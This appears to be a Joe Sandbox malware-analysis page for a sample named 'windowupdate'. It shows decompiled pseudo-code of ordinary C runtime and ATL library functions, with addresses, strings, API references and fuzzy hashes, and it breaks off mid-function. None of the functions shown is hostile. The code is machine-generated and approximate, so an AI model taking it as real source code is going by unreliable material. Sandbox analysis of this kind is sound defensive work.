                      • Instruction ID: 47a88f9997fef201fac5c1fbb5eccb4f19fdb8eff0456b802a50c3402415cb1b
                      • Opcode Fuzzy Hash: 380ebe3a89da70d78dac604bbb2e92308782a52e2bae83041ce3af96d0a1da34
                      • Instruction Fuzzy Hash: F0315474E00208AFCB04EF64C892BAD7775EF65310F14C09AF9595B286EB31EA41CBB0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00DB5530 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 80timeCOMMON
                      Download Yara Rule
                      C-Code - Quality: 95%
                      			E00DB5530(intOrPtr _a4) {
				char _v8;
				char _v12;
				intOrPtr _t27;
				void* _t35;
				void* _t37;
				void* _t40;
				intOrPtr _t58;
				intOrPtr _t62;
				void* _t64;

				_t66 = _a4;
				if(_a4 == 0) {
					_t40 = L00D84930(_t66, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\_getbuf.cpp", 0x12, 0, L"%ls", L"public_stream != nullptr");
					_t64 = _t64 + 0x18;
					if(_t40 == 1) {
						asm("int3");
					}
				}
				E00D66E20( &_v8, _a4);
				_t58 =  *0xf21184; // 0x0
				 *0xf21184 = _t58 + 1;
				_t27 = E00D8C129(E00D4BF60( &_v12, E00D89580(0x1000, 2, "minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\_getbuf.cpp", 0x1b)));
				 *((intOrPtr*)(E00D67320( &_v8) + 4)) = _t27;
				E00D4BFA0( &_v12);
				if( *((intOrPtr*)(E00D67320( &_v8) + 4)) == 0) {
					E00D99080( &_v8, 0x400);
					_t62 = E00D67320( &_v8) + 0x14;
					__eflags = _t62;
					 *((intOrPtr*)(E00D67320( &_v8) + 4)) = _t62;
					 *((intOrPtr*)(E00D67320( &_v8) + 0x18)) = 2;
				} else {
					E00D99080( &_v8, 0x40);
					 *((intOrPtr*)(E00D67320( &_v8) + 0x18)) = 0x1000;
				}
				_t35 = E00D67320( &_v8);
				 *((intOrPtr*)(E00D67320( &_v8))) =  *((intOrPtr*)(_t35 + 4));
				_t37 = E00D67320( &_v8);
				 *((intOrPtr*)(_t37 + 8)) = 0;
				return _t37;
			}












                      0x00db5539
                      0x00db553d
                      0x00db5554
                      0x00db5559
                      0x00db555f
                      0x00db5561
                      0x00db5561
                      0x00db555f
                      0x00db5569
                      0x00db556e
                      0x00db5577
                      0x00db559e
                      0x00db55ad
                      0x00db55b3
                      0x00db55c4
                      0x00db55e9
                      0x00db55f8
                      0x00db55f8
                      0x00db5603
                      0x00db560e
                      0x00db55c6
                      0x00db55cb
                      0x00db55d8
                      0x00db55d8
                      0x00db5618
                      0x00db562a
                      0x00db562f
                      0x00db5634
                      0x00db563f

                      APIs
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 00DB5569
                      • __wcstombs_l.LIBCMTD ref: 00DB558B
                      Strings
                      • public_stream != nullptr, xrefs: 00DB553F
                      • minkernel\crts\ucrt\src\appcrt\stdio\_getbuf.cpp, xrefs: 00DB554D
                      • %ls, xrefs: 00DB5544
                      • minkernel\crts\ucrt\src\appcrt\stdio\_getbuf.cpp, xrefs: 00DB557F
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: TimevecTimevec::___wcstombs_lstd::_
                      • String ID: %ls$minkernel\crts\ucrt\src\appcrt\stdio\_getbuf.cpp$minkernel\crts\ucrt\src\appcrt\stdio\_getbuf.cpp$public_stream != nullptr
                      • API String ID: 2681442900-187094882
                      • Opcode ID: e8da5a1a7756b0802c67d5b4dbd26764e205c643d953648688e9d0b87ddd4f23
                      • Instruction ID: dad6c0e9b2db2cb018d6038189baf221758606a15b2c053576292c5e77d4f92c
                      • Opcode Fuzzy Hash: e8da5a1a7756b0802c67d5b4dbd26764e205c643d953648688e9d0b87ddd4f23
                      • Instruction Fuzzy Hash: 45212C31950108EBDB14FB60DD67BEDB764EF50704F544099E9162B292DB705F48EBB0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D33C10 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 74COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 36%
                      			E00D33C10(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				void* _t22;
				void* _t29;
				void* _t30;
				void* _t31;
				void* _t45;
				void* _t46;
				void* _t47;

				_t45 = __esi;
				_t44 = __edi;
				_t31 = __ebx;
				_v16 = 0xcccccccc;
				_v12 = 0xcccccccc;
				_v8 = 0xcccccccc;
				_v8 = __ecx;
				E00D34160(_v8 + 4, __edi, __eflags);
				_t50 =  *0xf215ec;
				if( *0xf215ec != 0) {
					_t30 = L00D84930(_t50, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0xbdf, 0, "%ls", L"_pAtlModule == 0");
					_t47 = _t47 + 0x18;
					_t51 = _t30 - 1;
					if(_t30 == 1) {
						asm("int3");
					}
				}
				 *((intOrPtr*)(_v8 + 4)) = 0;
				 *((intOrPtr*)(_v8 + 0xc)) = 0;
				 *((intOrPtr*)(_v8 + 8)) = 0;
				 *0xf215ec = _v8;
				 *((intOrPtr*)(_v8 + 0x28)) = 0;
				_t22 = E00D32900(_v8 + 0x10, _t45, _t51);
				_t52 = _t22;
				if(_t22 >= 0) {
					 *((intOrPtr*)(_v8 + 4)) = 0x24;
				} else {
					_push("ERROR : Unable to initialize critical section in CAtlModule\n");
					_push(0);
					_push(E00D3F210(0xf23704));
					_push(E00D323B0( &_v16, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0xbe9));
					E00D323E0(_t31, _t44, _t45, _t52);
					_t47 = _t47 + 0x10;
					if(0 == 0) {
						_t29 = L00D84930(0, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0xbea, 0, "%ls", 0xde40dc);
						_t47 = _t47 + 0x18;
						if(_t29 == 1) {
							asm("int3");
						}
					}
					 *0xf23675 = 1;
				}
				return E00DC1520(_v8, _t46 - _t47 + 0xc);
			}













                      0x00d33c10
                      0x00d33c10
                      0x00d33c10
                      0x00d33c16
                      0x00d33c1d
                      0x00d33c24
                      0x00d33c2b
                      0x00d33c34
                      0x00d33c39
                      0x00d33c40
                      0x00d33c5a
                      0x00d33c5f
                      0x00d33c62
                      0x00d33c65
                      0x00d33c67
                      0x00d33c67
                      0x00d33c65
                      0x00d33c6b
                      0x00d33c75
                      0x00d33c7f
                      0x00d33c89
                      0x00d33c92
                      0x00d33c9f
                      0x00d33ca4
                      0x00d33ca6
                      0x00d33d0b
                      0x00d33ca8
                      0x00d33ca8
                      0x00d33cad
                      0x00d33cb9
                      0x00d33ccc
                      0x00d33ccd
                      0x00d33cd2
                      0x00d33cd7
                      0x00d33cf1
                      0x00d33cf6
                      0x00d33cfc
                      0x00d33cfe
                      0x00d33cfe
                      0x00d33cfc
                      0x00d33cff
                      0x00d33cff
                      0x00d33d22

                      APIs
                      Strings
                      • ERROR : Unable to initialize critical section in CAtlModule, xrefs: 00D33CA8
                      • _pAtlModule == 0, xrefs: 00D33C42
                      • %ls, xrefs: 00D33C47, 00D33CDE
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 00D33C53, 00D33CEA
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 00D33CBF
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Smanip
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$ERROR : Unable to initialize critical section in CAtlModule$_pAtlModule == 0
                      • API String ID: 2140389272-3746135848
                      • Opcode ID: 745bee6eb95ad6af31fe42b366b70fd8444377cb53369bbea9bbd2ddfaacb43d
                      • Instruction ID: c3d77f7e09374062b20ece7407934455de84d0eae88ea0adc19db8c744d228aa
                      • Opcode Fuzzy Hash: 745bee6eb95ad6af31fe42b366b70fd8444377cb53369bbea9bbd2ddfaacb43d
                      • Instruction Fuzzy Hash: 5F21AE74E40208ABDB10FB99DA53B6DB764EB10704F248598E50127382D2B1AB148BB5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D35180 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 70COMMON
                      Download Yara Rule
                      C-Code - Quality: 38%
                      			E00D35180(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _t20;
				void* _t26;
				void* _t28;
				void* _t32;
				void* _t33;
				void* _t41;
				void* _t42;
				void* _t44;
				void* _t45;

				_t42 = __esi;
				_t41 = __edi;
				_t33 = __ebx;
				_v16 = 0xcccccccc;
				_v12 = 0xcccccccc;
				_v8 = 0xcccccccc;
				do {
					_t20 = _a4;
					_t47 =  *((intOrPtr*)(_t20 + 0x24));
					if( *((intOrPtr*)(_t20 + 0x24)) == 0) {
						_t32 = L00D84930(_t47, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlcom.h", 0xe94, 0, "%ls", L"m_pfnCreateInstance != 0");
						_t45 = _t45 + 0x18;
						if(_t32 == 1) {
							asm("int3");
						}
					}
				} while (0 != 0);
				_v8 = 0x80004003;
				if(_a16 == 0) {
					L10:
					return E00DC1520(_v8, _t44 - _t45 + 0xc);
				}
				 *_a16 = 0;
				if(_a8 == 0) {
					L9:
					_t26 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x24))))(_a8, _a12, _a16);
					__eflags = _t45 - _t45;
					_v8 = E00DC1520(_t26, __eflags);
					goto L10;
				}
				_t28 = E00D33640(_a12, _a12);
				_t52 = _t28;
				if(_t28 != 0) {
					goto L9;
				}
				_push("CComClassFactory: asked for non IUnknown interface while creating an aggregated object");
				_push(0);
				_push(E00D3F200(0xf237b8));
				_push(E00D323B0( &_v16, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlcom.h", 0xe9d));
				E00D323E0(_t33, _t41, _t42, _t52);
				_t45 = _t45 + 0x10;
				_v8 = 0x80040110;
				goto L10;
			}















                      0x00d35180
                      0x00d35180
                      0x00d35180
                      0x00d35187
                      0x00d3518e
                      0x00d35195
                      0x00d3519c
                      0x00d3519c
                      0x00d3519f
                      0x00d351a3
                      0x00d351bd
                      0x00d351c2
                      0x00d351c8
                      0x00d351ca
                      0x00d351ca
                      0x00d351c8
                      0x00d351cb
                      0x00d351cf
                      0x00d351da
                      0x00d3524e
                      0x00d3525f
                      0x00d3525f
                      0x00d351df
                      0x00d351e9
                      0x00d3522e
                      0x00d35242
                      0x00d35244
                      0x00d3524b
                      0x00000000
                      0x00d3524b
                      0x00d351ef
                      0x00d351f4
                      0x00d351f6
                      0x00000000
                      0x00000000
                      0x00d351f8
                      0x00d351fd
                      0x00d35209
                      0x00d3521c
                      0x00d3521d
                      0x00d35222
                      0x00d35225
                      0x00000000

                      APIs
                      Strings
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlcom.h, xrefs: 00D3520F
                      • m_pfnCreateInstance != 0, xrefs: 00D351A5
                      • %ls, xrefs: 00D351AA
                      • CComClassFactory: asked for non IUnknown interface while creating an aggregated object, xrefs: 00D351F8
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlcom.h, xrefs: 00D351B6
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Smanip
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlcom.h$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlcom.h$CComClassFactory: asked for non IUnknown interface while creating an aggregated object$m_pfnCreateInstance != 0
                      • API String ID: 2140389272-1138684019
                      • Opcode ID: 7f0314f70e703c7e633ccdf80fa6a594e331e97429b241e4cd767f41d4e58ca3
                      • Instruction ID: 2983c201f0a213502f05a91b7e800156415db5e14cc46c40c7d49692d3c076da
                      • Opcode Fuzzy Hash: 7f0314f70e703c7e633ccdf80fa6a594e331e97429b241e4cd767f41d4e58ca3
                      • Instruction Fuzzy Hash: 38218EB5E40319AFDB10EF99ED42FAE77A4EB04740F144458F9086B285D6B49E048BB6
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D3DC80 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 60COMMON
                      Download Yara Rule
                      C-Code - Quality: 82%
                      			E00D3DC80(intOrPtr __ecx, void* __esi) {
				intOrPtr _v8;
				void* _t11;
				intOrPtr _t12;
				void* _t16;
				void* _t18;
				void* _t19;
				void* _t28;
				void* _t29;

				_push(__ecx);
				_v8 = 0xcccccccc;
				_v8 = __ecx;
				_t11 = E00DC1520(IsWindow( *(_v8 + 4)), _t29 - _t29);
				_t32 = _t11;
				if(_t11 == 0) {
					_t19 = L00D84930(_t32, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0xfdc, 0, "%ls", L"::IsWindow(this->m_hWnd)");
					_t29 = _t29 + 0x18;
					if(_t19 == 1) {
						asm("int3");
					}
				}
				_t12 = _v8;
				_t34 =  *(_t12 + 0x20) & 0x000000ff;
				if(( *(_t12 + 0x20) & 0x000000ff) != 0) {
					_t18 = L00D84930(_t34, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0xfde, 0, "%ls", L"!m_bModal");
					_t29 = _t29 + 0x18;
					if(_t18 == 1) {
						asm("int3");
					}
				}
				if(E00DC1520(DestroyWindow( *(_v8 + 4)), _t29 - _t29) != 0) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				return E00DC1520(_t16, _t28 - _t29 + 4);
			}











                      0x00d3dc83
                      0x00d3dc85
                      0x00d3dc8c
                      0x00d3dca0
                      0x00d3dca5
                      0x00d3dca7
                      0x00d3dcc1
                      0x00d3dcc6
                      0x00d3dccc
                      0x00d3dcce
                      0x00d3dcce
                      0x00d3dccc
                      0x00d3dccf
                      0x00d3dcd6
                      0x00d3dcd8
                      0x00d3dcf2
                      0x00d3dcf7
                      0x00d3dcfd
                      0x00d3dcff
                      0x00d3dcff
                      0x00d3dcfd
                      0x00d3dd18
                      0x00d3dd1e
                      0x00d3dd1a
                      0x00d3dd1a
                      0x00d3dd1a
                      0x00d3dd31

                      APIs
                      • IsWindow.USER32(?), ref: 00D3DC98
                      • DestroyWindow.USER32(?,?,?,?,00D3C6A1,71E60372,?,?,00DC4F30,000000FF), ref: 00D3DD09
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Window$Destroy
                      • String ID: !m_bModal$%ls$::IsWindow(this->m_hWnd)$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h
                      • API String ID: 3707531092-711770546
                      • Opcode ID: 1e25f523019e2f7e78370ad49e093ac2361a2bddd867bf7bf4ce4278414bb3eb
                      • Instruction ID: e4f8503104a005acc264c1a3f645dc0aeab4b3cd613edc22c94cc73ebc873191
                      • Opcode Fuzzy Hash: 1e25f523019e2f7e78370ad49e093ac2361a2bddd867bf7bf4ce4278414bb3eb
                      • Instruction Fuzzy Hash: 94110435E503166FC720B759BD43F6E77658B04B40F1401A8FA09AB683E1A0EE004AB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D36D70 Relevance: 10.6, APIs: 7, Instructions: 51memoryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00D36D70(void* __esi) {
				intOrPtr _t21;
				intOrPtr _t22;
				void* _t25;
				void* _t26;

				_t21 =  *0xf215b4; // 0x80000001
				if(_t21 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c])) + 4))) {
					E00D47480(0xf215b4);
					_t26 = _t26 + 4;
					if( *0xf215b4 == 0xffffffff) {
						E00D36720(0xf215b8, E00DC1520(GetProcessHeap(), _t26 - _t26));
						E00D48270(0xf215b8, 0xdc57c0);
						E00D47430(0xf215b4);
						_t26 = _t26 + 8;
					}
				}
				_t22 =  *0xf2159c; // 0x80000002
				if(_t22 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c])) + 4))) {
					E00D47480(0xf2159c);
					_t26 = _t26 + 4;
					_t33 =  *0xf2159c - 0xffffffff;
					if( *0xf2159c == 0xffffffff) {
						E00D36D00(0xf2369c, _t33, 0xf215b8);
						E00D48270(0xf2369c, 0xdc57a0);
						E00D47430(0xf2159c);
						_t26 = _t26 + 8;
					}
				}
				return E00DC1520(0xf2369c, _t25 - _t26);
			}







                      0x00d36d7c
                      0x00d36d88
                      0x00d36d8f
                      0x00d36d94
                      0x00d36d9e
                      0x00d36db5
                      0x00d36dbf
                      0x00d36dcc
                      0x00d36dd1
                      0x00d36dd1
                      0x00d36d9e
                      0x00d36ddc
                      0x00d36de8
                      0x00d36def
                      0x00d36df4
                      0x00d36df7
                      0x00d36dfe
                      0x00d36e0a
                      0x00d36e14
                      0x00d36e21
                      0x00d36e26
                      0x00d36e26
                      0x00d36dfe
                      0x00d36e37

                      APIs
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Init_thread_footerInit_thread_header_atexit$HeapProcess
                      • String ID:
                      • API String ID: 3065931843-0
                      • Opcode ID: 02f6a09d652fad34e61bc4315cfb36594b9c888e962554b1d5f5b4c4d285a03c
                      • Instruction ID: a355eb618e837590259ac2b67e96e84de8ef2aca49e3625e74445e4c396edae0
                      • Opcode Fuzzy Hash: 02f6a09d652fad34e61bc4315cfb36594b9c888e962554b1d5f5b4c4d285a03c
                      • Instruction Fuzzy Hash: 2A0108F9A00624EBC530B754B853E6D3212EBA8718F484274F40B17297D721E901AAFB
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D34020 Relevance: 9.1, APIs: 6, Instructions: 101COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00D34020(void* __esi, CHAR* _a4, CHAR* _a8) {
				char _v5;
				char _v6;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t39;
				void* _t75;
				void* _t76;

				_v12 = 0xcccccccc;
				_v8 = 0xcccccccc;
				_v5 = E00DC1520(CharUpperA( *_a4 & 0x000000ff), _t76 - _t76);
				_v6 = E00DC1520(CharUpperA( *_a8 & 0x000000ff), _t76 - _t76);
				while(_v5 != 0 && _v5 == _v6 && _v5 != 0x20 && _v5 != 9) {
					_a4 = E00DC1520(CharNextA(_a4), _t76 - _t76);
					_a8 = E00DC1520(CharNextA(_a8), _t76 - _t76);
					_v5 = E00DC1520(CharUpperA( *_a4 & 0x000000ff), _t76 - _t76);
					_v6 = E00DC1520(CharUpperA( *_a8 & 0x000000ff), _t76 - _t76);
				}
				__eflags = _v5;
				if(_v5 == 0) {
					L9:
					__eflags = _v6;
					if(_v6 == 0) {
						L12:
						_t39 = 0;
					} else {
						__eflags = _v6 - 0x20;
						if(_v6 == 0x20) {
							goto L12;
						} else {
							__eflags = _v6 - 9;
							if(_v6 != 9) {
								goto L13;
							} else {
								goto L12;
							}
						}
					}
				} else {
					__eflags = _v5 - 0x20;
					if(_v5 == 0x20) {
						goto L9;
					} else {
						__eflags = _v5 - 9;
						if(_v5 != 9) {
							L13:
							__eflags = _v5 - _v6;
							if(_v5 >= _v6) {
								_v12 = 1;
							} else {
								_v12 = 0xffffffff;
							}
							_t39 = _v12;
						} else {
							goto L9;
						}
					}
				}
				__eflags = _t75 - _t76 + 8;
				return E00DC1520(_t39, _t75 - _t76 + 8);
			}










                      0x00d34027
                      0x00d3402e
                      0x00d3404b
                      0x00d34064
                      0x00d34067
                      0x00d340a4
                      0x00d340ba
                      0x00d340d3
                      0x00d340ec
                      0x00d340ec
                      0x00d340f8
                      0x00d340fa
                      0x00d3410e
                      0x00d34112
                      0x00d34114
                      0x00d34128
                      0x00d34128
                      0x00d34116
                      0x00d3411a
                      0x00d3411d
                      0x00000000
                      0x00d3411f
                      0x00d34123
                      0x00d34126
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00d34126
                      0x00d3411d
                      0x00d340fc
                      0x00d34100
                      0x00d34103
                      0x00000000
                      0x00d34105
                      0x00d34109
                      0x00d3410c
                      0x00d3412c
                      0x00d34134
                      0x00d34136
                      0x00d34141
                      0x00d34138
                      0x00d34138
                      0x00d34138
                      0x00d34148
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00d3410c
                      0x00d34103
                      0x00d3414f
                      0x00d34159

                      APIs
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Char$Upper$Next
                      • String ID:
                      • API String ID: 3006421506-0
                      • Opcode ID: b005a01d8e90fdcf01b540222652dc96effae5c1d95f475644afade012a59217
                      • Instruction ID: 6ee4133f56dc8d77ec922b8e0ee443634926a91389c8d4e066cbf0895623f932
                      • Opcode Fuzzy Hash: b005a01d8e90fdcf01b540222652dc96effae5c1d95f475644afade012a59217
                      • Instruction Fuzzy Hash: 30312831D0C6E56ACF119BB884D15BEBF759E13212F0841C9E8A2A7242D23DDF80CBB0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D52860 Relevance: 9.1, APIs: 6, Instructions: 72COMMON
                      Download Yara Rule
                      C-Code - Quality: 75%
                      			E00D52860(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v5;
				intOrPtr _v12;
				char _v20;
				char _v28;
				char _v36;
				char* _t19;
				intOrPtr _t20;
				intOrPtr* _t27;
				intOrPtr _t29;
				intOrPtr _t32;
				char* _t46;
				char* _t47;
				void* _t57;
				void* _t58;

				_t56 = __esi;
				_t55 = __edi;
				_t38 = __ebx;
				_t19 =  *0xf20640; // 0x0
				if( *_t19 != 0) {
					_t20 = E00D58D00(__ebx, __edi, __esi,  &_v28);
					_t58 = _t57 + 4;
					_v12 = _t20;
					E00D4FBB0(_v12,  &_v20, 0x7b);
					_v5 = 0;
					while(1 != 0) {
						if((_v5 & 0x000000ff) != 0) {
							E00D4FDE0( &_v20, 0x2c);
						}
						_t27 = E00D586C0(_t38, _t55, _t56,  &_v36);
						_t58 = _t58 + 4;
						E00D4FD40( &_v20, _t27);
						_t46 =  *0xf20640; // 0x0
						if( *_t46 == 0x40) {
							_t29 =  *0xf20640; // 0x0
							 *0xf20640 = _t29 + 1;
							_t47 =  *0xf20640; // 0x0
							if( *_t47 != 0x40) {
								_v5 = 1;
								continue;
							}
							_t32 =  *0xf20640; // 0x0
